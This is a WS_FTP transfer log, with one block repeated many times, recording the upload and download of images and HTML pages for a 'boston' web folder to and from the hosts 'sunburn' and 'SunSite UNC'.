10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
